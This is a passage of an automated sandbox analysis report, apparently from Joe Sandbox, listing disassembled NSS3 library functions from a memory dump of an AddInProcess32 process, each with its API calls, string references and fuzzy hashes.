                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(pkcs11:,00000000,00000007,00000000,?,6CCFCB39,00000000,00000000,00000000,00000000), ref: 6CD16F44
                                                                                        • Part of subcall function 6CD16FEA: PORT_NewArena_Util.NSS3(00000400,00000000,6CD16F60,00000000,00000000,00000000), ref: 6CD16FF0
                                                                                        • Part of subcall function 6CD17663: strchr.VCRUNTIME140(6CD17231,00000000,00000000,00000000,00000000,00000010,6CD17231,00000000,00000000,00000000,00000000,00000000), ref: 6CD1767D
                                                                                        • Part of subcall function 6CD17663: memcmp.VCRUNTIME140(00000000,00000000,?,00000000,00000000,00000000,00000010,6CD17231,00000000,00000000,00000000,00000000,00000000), ref: 6CD17777
                                                                                      Strings
                                                                                      • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&, xrefs: 6CD16F7E
                                                                                      • pkcs11:, xrefs: 6CD16F3F
                                                                                      • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=/?|, xrefs: 6CD16FBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Arena_Utilmemcmpstrchrstrncmp
                                                                                      • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=/?|$pkcs11:
                                                                                      • API String ID: 1682315567-890694778
                                                                                      • Opcode ID: 91b3d2677bddfafc0b42f115ffa60799ec7943813c211c3d4b2e5e7f4218c776
                                                                                      • Instruction ID: 4b3f91769e7be50cdcc0ad29e1a9dbb260c76fad05ab157338aae0a71f90fdd0
                                                                                      • Opcode Fuzzy Hash: 91b3d2677bddfafc0b42f115ffa60799ec7943813c211c3d4b2e5e7f4218c776
                                                                                      • Instruction Fuzzy Hash: B711E371658308BBF7108B61DC41FDB3AECDB04748F014522FE09EADA0E760F64A8390
                                                                                      APIs
                                                                                        • Part of subcall function 6CCC6EBA: PR_CallOnce.NSS3(6CD88840,R,6CCCBE67,?,?,6CCCBAF6,00000002,00000001,00000000,6CCCBB1F,00000000,00000000), ref: 6CCC6EC4
                                                                                      • PR_EnumerateHostEnt.NSS3(?,?,?,?), ref: 6CCD48A3
                                                                                        • Part of subcall function 6CCD4922: memset.VCRUNTIME140(?,00000000,00000070,?,?,?,?,6CCD48A8,?,?,?,?), ref: 6CCD4940
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CCD48E7
                                                                                      • memset.VCRUNTIME140(?,00000000,00000070), ref: 6CCD4907
                                                                                      • htons.WSOCK32(?), ref: 6CCD4912
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$CallEnumerateHostOncehtonsmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3429184456-0
                                                                                      • Opcode ID: 8070c9755a2db5b1612048315a8d0bf1168d973f19bd3ef6a9c1735d0a40f458
                                                                                      • Instruction ID: f52c87bf14221beaa505fe8cf37848f0dd355ce396dc900c5ebd21b639f788f3
                                                                                      • Opcode Fuzzy Hash: 8070c9755a2db5b1612048315a8d0bf1168d973f19bd3ef6a9c1735d0a40f458
                                                                                      • Instruction Fuzzy Hash: 09119032A00B55AFCB208F658C41A9B7778EF40718B064629EF15EBB20E331F864C794
                                                                                      APIs
                                                                                        • Part of subcall function 6CD46AC0: PR_GetIdentitiesLayer.NSS3(?,?,6CD2E3A3,?), ref: 6CD46ACC
                                                                                        • Part of subcall function 6CD46AC0: PORT_SetError_Util.NSS3(FFFFE891,?), ref: 6CD46ADF
                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CD45D7B
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000008,00000000), ref: 6CD45D89
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000008,00000000,00000008,00000000), ref: 6CD45D94
                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CD45DAD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Item_Monitor$CopyEnterError_ExitFreeIdentitiesLayer
                                                                                      • String ID:
                                                                                      • API String ID: 301261484-0
                                                                                      • Opcode ID: c05f85af8356044c47cc975b52692d15e6d1ddc33ec2337dd8eb470b452be9c5
                                                                                      • Instruction ID: b4b64c5df85914cd20bd2cbeea835ecec5e2b7568942eca1c7d1400c725d1fa3
                                                                                      • Opcode Fuzzy Hash: c05f85af8356044c47cc975b52692d15e6d1ddc33ec2337dd8eb470b452be9c5
                                                                                      • Instruction Fuzzy Hash: B11106B2804619FFDB019F69DC889CEB778FF05338F148256FA1452A60EB3099198AE0
                                                                                      APIs
                                                                                        • Part of subcall function 6CC824EE: sqlite3_free.NSS3(?,?,?,?,6CC6BCF3,?), ref: 6CC8250F
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC6BD93
                                                                                      • sqlite3_value_bytes.NSS3(?,?), ref: 6CC6BD9D
                                                                                      • sqlite3_malloc.NSS3(00000001,?,?), ref: 6CC6BDA8
                                                                                        • Part of subcall function 6CC63C6C: sqlite3_initialize.NSS3(?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63C6F
                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC6BDC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpysqlite3_freesqlite3_initializesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                      • String ID:
                                                                                      • API String ID: 2696170731-0
                                                                                      • Opcode ID: 025b730ff5e602d89f5cf2836d160315a366e33ec5aa00303028f84f1d0d0ff3
                                                                                      • Instruction ID: 3a0591b19c13df4cbb2b5572518c1b90d4aec6bd09c2c09bbed3cf66a3dbe97c
                                                                                      • Opcode Fuzzy Hash: 025b730ff5e602d89f5cf2836d160315a366e33ec5aa00303028f84f1d0d0ff3
                                                                                      • Instruction Fuzzy Hash: D111C672900211ABCB118F6AC9849C6FBA9FF05374B04859AF9088BF10E731E810DBE0
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(E80875FF,00000000,00000011,?,00000000,6CCE6283,?,6CCEA998,6CCE6283,00000000,?,?,?,6CCE6283,?,00000000), ref: 6CCEA82B
                                                                                      • memcpy.VCRUNTIME140(00000000,458D1875,6CCEA998,E80875FF,00000000,00000011,?,00000000,6CCE6283,?,6CCEA998,6CCE6283,00000000), ref: 6CCEA838
                                                                                      • memcpy.VCRUNTIME140(E80875FF,458D1875,00000011,?,00000000,6CCE6283,?,6CCEA998,6CCE6283,00000000,?,?,?,6CCE6283,?,00000000), ref: 6CCEA85E
                                                                                      • PORT_SetError_Util.NSS3(FFFFE89D,?,00000000,6CCE6283,?,6CCEA998,6CCE6283,00000000,?,?,?,6CCE6283,?,00000000,00000000,?), ref: 6CCEA872
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$ErrorError_Utilmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2916229000-0
                                                                                      • Opcode ID: 336b7f314684e1af1c44dfc67575568cb98f87520b0e814b291709b14138e886
                                                                                      • Instruction ID: bcdf08ed4949b532ccb775bb9158810054570ebefbd3f705cf5820b6adc20087
                                                                                      • Opcode Fuzzy Hash: 336b7f314684e1af1c44dfc67575568cb98f87520b0e814b291709b14138e886
                                                                                      • Instruction Fuzzy Hash: 9501D2756042046FDB249E6DCC44D9A7FACDFCA328715C229F94DCB761E630D80386A0
                                                                                      APIs
                                                                                        • Part of subcall function 6CCEEA87: PORT_Free_Util.NSS3(?,?,00000000,6CCEE9E8,?,?,?,6CCEDF05), ref: 6CCEEAD3
                                                                                        • Part of subcall function 6CCEEA87: PR_DestroyLock.NSS3(05254040,?,00000000,6CCEE9E8,?,?,?,6CCEDF05), ref: 6CCEEAE9
                                                                                        • Part of subcall function 6CCDEC5F: PR_DestroyLock.NSS3(05203CA0,00000000,?,6CCEE9F7,?,?,?,6CCEDF05), ref: 6CCDEC73
                                                                                        • Part of subcall function 6CCDEC5F: PR_DestroyLock.NSS3(05203D30,00000000,?,6CCEE9F7,?,?,?,6CCEDF05), ref: 6CCDEC8B
                                                                                        • Part of subcall function 6CCDEC5F: PR_DestroyLock.NSS3(05203DC0,00000000,?,6CCEE9F7,?,?,?,6CCEDF05), ref: 6CCDECA4
                                                                                        • Part of subcall function 6CCE7C1E: PR_EnterMonitor.NSS3(0520EF40,?,6CCEEA01,?,?,?,6CCEDF05), ref: 6CCE7C2D
                                                                                        • Part of subcall function 6CCE7C1E: CERT_ClearOCSPCache.NSS3(6CCEEA01,?,?,?,6CCEDF05), ref: 6CCE7C3E
                                                                                        • Part of subcall function 6CCE7C1E: PL_HashTableDestroy.NSS3(6CCEEA01,?,?,?,6CCEDF05), ref: 6CCE7C49
                                                                                        • Part of subcall function 6CCE7C1E: PR_ExitMonitor.NSS3(6CCEEA01,?,?,?,6CCEDF05), ref: 6CCE7C91
                                                                                        • Part of subcall function 6CCE7C1E: PR_DestroyMonitor.NSS3(?,?,?,6CCEDF05), ref: 6CCE7C9D
                                                                                      • SECOID_Shutdown.NSS3(?,?,?,6CCEDF05), ref: 6CCEEA01
                                                                                        • Part of subcall function 6CD1C30B: PL_HashTableDestroy.NSS3(05212200,?,6CCEEA06,?,?,?,6CCEDF05), ref: 6CD1C318
                                                                                        • Part of subcall function 6CD1C30B: PL_HashTableDestroy.NSS3(05212220,?,6CCEEA06,?,?,?,6CCEDF05), ref: 6CD1C32E
                                                                                        • Part of subcall function 6CD1C30B: PL_HashTableDestroy.NSS3(00000000,?,6CCEEA06,?,?,?,6CCEDF05), ref: 6CD1C360
                                                                                        • Part of subcall function 6CD1C30B: PORT_FreeArena_Util.NSS3(0520C190,00000000,?,6CCEEA06,?,?,?,6CCEDF05), ref: 6CD1C377
                                                                                        • Part of subcall function 6CD1C30B: PORT_Free_Util.NSS3(00000000,?,6CCEEA06,?,?,?,6CCEDF05), ref: 6CD1C38E
                                                                                        • Part of subcall function 6CD1C30B: memset.VCRUNTIME140(6CD89680,00000000,00000594,?,6CCEEA06,?,?,?,6CCEDF05), ref: 6CD1C3FF
                                                                                        • Part of subcall function 6CCDECB8: PR_Lock.NSS3(6CCDEBF4,?,?,?,?,?,6CCEE54B), ref: 6CCDECC7
                                                                                        • Part of subcall function 6CCDECB8: PL_HashTableDestroy.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDECD3
                                                                                        • Part of subcall function 6CCDECB8: PR_Unlock.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDECE5
                                                                                        • Part of subcall function 6CCDECB8: PR_DestroyLock.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDECF1
                                                                                        • Part of subcall function 6CD13A00: PK11_FreeSlot.NSS3(05225000,?,6CCEEA18,00000000,?,?,?,6CCEDF05), ref: 6CD13A0D
                                                                                        • Part of subcall function 6CD14811: SECMOD_DestroyModule.NSS3(05204610,00000000,6CCEEA1E,?,?,?,6CCEDF05), ref: 6CD14834
                                                                                        • Part of subcall function 6CD14811: SECMOD_DestroyModule.NSS3(05204410,00000000,6CCEEA1E,?,?,?,6CCEDF05), ref: 6CD1484A
                                                                                        • Part of subcall function 6CD14811: PORT_SetError_Util.NSS3(FFFFE08B,6CCEEA1E,?,?,?,6CCEDF05), ref: 6CD148B1
                                                                                        • Part of subcall function 6CD0E75E: PR_DestroyLock.NSS3(052540D0,6CCEEA2B,?,?,?,6CCEDF05), ref: 6CD0E768
                                                                                      • sqlite3_release_memory.NSS3(?,?,?,6CCEDF05), ref: 6CCEEA2B
                                                                                      • PORT_SetError_Util.NSS3(FFFFE08B,?,?,?,6CCEDF05), ref: 6CCEEA49
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,6CCEDF05), ref: 6CCEEA75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$Lock$Util$HashTable$Free_Monitor$Error_FreeModule$Arena_CacheClearEnterErrorExitK11_ShutdownSlotUnlockmemsetsqlite3_release_memory
                                                                                      • String ID:
                                                                                      • API String ID: 2880928201-0
                                                                                      • Opcode ID: b0cc714afb63b4c736ff398863bec63a890e2792e1120885eca15c6647839338
                                                                                      • Instruction ID: 8df2e81eaa651002f679f223232d7ba50e6c4fe381bd08524e7d856555462aba
                                                                                      • Opcode Fuzzy Hash: b0cc714afb63b4c736ff398863bec63a890e2792e1120885eca15c6647839338
                                                                                      • Instruction Fuzzy Hash: F401B572A052514A9B147FF92C804993AE45FCB6BD325073EE921C7FD0EF34C84986B1
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,?,6CD2677E,00000000,?,?), ref: 6CD2690C
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SEC_PKCS7DestroyContentInfo.NSS3(?,?,00000000,?,6CD2677E,00000000,?,?), ref: 6CD26967
                                                                                      • PORT_SetError_Util.NSS3(00000000,?,00000000,?,6CD2677E,00000000,?,?), ref: 6CD26973
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$ContentDestroyErrorInfo
                                                                                      • String ID:
                                                                                      • API String ID: 3647696682-0
                                                                                      • Opcode ID: 4471ea7194b28a9038d126cd5e769183d81db2b13de30ed2d1a209ba7647983b
                                                                                      • Instruction ID: 4e6e6944e20f901c9513b7e7046069881ea2174b8f9d0dbe766bcf6bf92d8e93
                                                                                      • Opcode Fuzzy Hash: 4471ea7194b28a9038d126cd5e769183d81db2b13de30ed2d1a209ba7647983b
                                                                                      • Instruction Fuzzy Hash: 65115E31406B01DACB225F699A0055AB7E4FF80B7C3200B2ED6E5C5EB4EF36E052EE10
                                                                                      APIs
                                                                                      • PR_MemUnmap.NSS3(00000000,?,?,0000278F,?,6CD435CC,?), ref: 6CD42DB6
                                                                                      • PORT_Free_Util.NSS3(00000000,?,0000278F,?,6CD435CC,?), ref: 6CD42DC2
                                                                                        • Part of subcall function 6CD406EF: PORT_SetError_Util.NSS3(FFFFE89D,?,?,?,6CD42D9D,0000008C,?,00000000,?,0000278F,?,6CD435CC,?), ref: 6CD4070D
                                                                                      • PR_CloseFileMap.NSS3(?,?,0000278F,?,6CD435CC,?), ref: 6CD42DD7
                                                                                      • memset.VCRUNTIME140(?,00000000,00000090,?,0000278F,?,6CD435CC,?), ref: 6CD42DED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$CloseError_FileFree_Unmapmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3403834653-0
                                                                                      • Opcode ID: 99148b7f4db04fad5278e6226023aa09ef9e4ad549e8a77f88ac7dc1a73ea094
                                                                                      • Instruction ID: debe1df8034a8a5cfa1e3e302d9e40938e31af19cc99c7ec1ba2194d615f3369
                                                                                      • Opcode Fuzzy Hash: 99148b7f4db04fad5278e6226023aa09ef9e4ad549e8a77f88ac7dc1a73ea094
                                                                                      • Instruction Fuzzy Hash: 4D015E32201F10DFF7224B25D848B96B7E8FF45329F20841DE7A6879B0D771B4848BA0
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,00000000,00000070,?,?,?,?,6CCD48A8,?,?,?,?), ref: 6CCD4940
                                                                                      • htons.WSOCK32(?), ref: 6CCD4965
                                                                                      • memcpy.VCRUNTIME140(?,00000000,?,?), ref: 6CCD4999
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: htonsmemcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 923471058-0
                                                                                      • Opcode ID: f1cdfb493bdf59c9afc5d33a3253dc432eda76e11006740eab2a3d6b73c2c2f6
                                                                                      • Instruction ID: 7505304049f27bf91d7b1d4492edfe0d4bfa81e7a4cd22056339a306bb1859df
                                                                                      • Opcode Fuzzy Hash: f1cdfb493bdf59c9afc5d33a3253dc432eda76e11006740eab2a3d6b73c2c2f6
                                                                                      • Instruction Fuzzy Hash: 5E118276104605AEDB10CF96C881B96B3BCEF44725F05C41AFB198BA51E370F949CBA5
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?), ref: 6CD13EF0
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001), ref: 6CD13F10
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PR_Unlock.NSS3(?), ref: 6CD13F53
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorError_LockUnlockUtil
                                                                                      • String ID:
                                                                                      • API String ID: 1111570012-0
                                                                                      • Opcode ID: 61cf0d5a21d6def181c31dc395835d4dc6dfedeb5ecf9d88d8bb76802ae869df
                                                                                      • Instruction ID: 89f9962af9ef7553c2984e0773e1300f4c297a8ef250d4f880f9096ba5149e58
                                                                                      • Opcode Fuzzy Hash: 61cf0d5a21d6def181c31dc395835d4dc6dfedeb5ecf9d88d8bb76802ae869df
                                                                                      • Instruction Fuzzy Hash: 0201847220C601EB97105B7AFC0889777F8EF863387140619F999C7EB0EB30E405C6A0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$InitLastgethostbyname
                                                                                      • String ID:
                                                                                      • API String ID: 137720365-0
                                                                                      • Opcode ID: e9445b507ca96bb2eabb2264151fa280f725729587cf655d3c38126cc12d2aa5
                                                                                      • Instruction ID: 76f5cd2c944864f65bc59644bf8e0ffdcfddc0deb3dc9839fe01c8beac5dc586
                                                                                      • Opcode Fuzzy Hash: e9445b507ca96bb2eabb2264151fa280f725729587cf655d3c38126cc12d2aa5
                                                                                      • Instruction Fuzzy Hash: 44014733A0521476CF10AF98AD00BDB336C9B80B64F228226FB16978D0FB70F941CA94
                                                                                      APIs
                                                                                      • CERT_FreeNicknames.NSS3(E837FF08,00000000,00000000,?,6CD2513A,00000000,?,?,?,?,?,?), ref: 6CD24E1F
                                                                                        • Part of subcall function 6CCE523D: PORT_FreeArena_Util.NSS3(00000000,00000000,?,6CD1A86C,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 6CCE5247
                                                                                      • SEC_PKCS7DestroyContentInfo.NSS3(08006856,00000000,00000000,?,6CD2513A,00000000,?,?,?,?,?,?), ref: 6CD24E33
                                                                                      • CERT_FreeNicknames.NSS3(8BFFFF78,00000000,00000000,?,6CD2513A,00000000,?,?,?,?,?,?), ref: 6CD24E6C
                                                                                      • PK11_DestroyContext.NSS3(146A5074,00000001,00000000,00000000,?,6CD2513A,00000000,?,?,?,?,?,?), ref: 6CD24E85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$DestroyNicknames$Arena_ContentContextInfoK11_Util
                                                                                      • String ID:
                                                                                      • API String ID: 2184980470-0
                                                                                      • Opcode ID: c21b87c67b924fbfb8d3e5f66b0241c3138fb19be1f2382d3e4bc8aa105688c0
                                                                                      • Instruction ID: 4346d60c2d18d73fc9f6606632a227bf6b23ee5e7feb5833f24eb6ad9b7f83e9
                                                                                      • Opcode Fuzzy Hash: c21b87c67b924fbfb8d3e5f66b0241c3138fb19be1f2382d3e4bc8aa105688c0
                                                                                      • Instruction Fuzzy Hash: 1F0144716027019BE7148F66DC40F93B7D8BF54718F20851EEA6DD7A60DB75E4448750
                                                                                      APIs
                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,?,00000000,?,6CD1BC3A), ref: 6CD1BE2D
                                                                                        • Part of subcall function 6CD1BDC6: PORT_ZFree_Util.NSS3(?,?,?,?,6CCEB4BB,?,00000000), ref: 6CD1BDD7
                                                                                        • Part of subcall function 6CD1BDC6: PORT_ZFree_Util.NSS3(?,0000000C,?,?,6CCEB4BB,?,00000000), ref: 6CD1BDEF
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000000,00000000,?,00000000,?,6CD1BC3A), ref: 6CD1BE34
                                                                                      • PORT_Free_Util.NSS3(00000001,?,00000000,?,6CD1BC3A,00000000,00000001,00000001), ref: 6CD1BE47
                                                                                      • PORT_Free_Util.NSS3(00000001,00000000), ref: 6CD1BE5C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
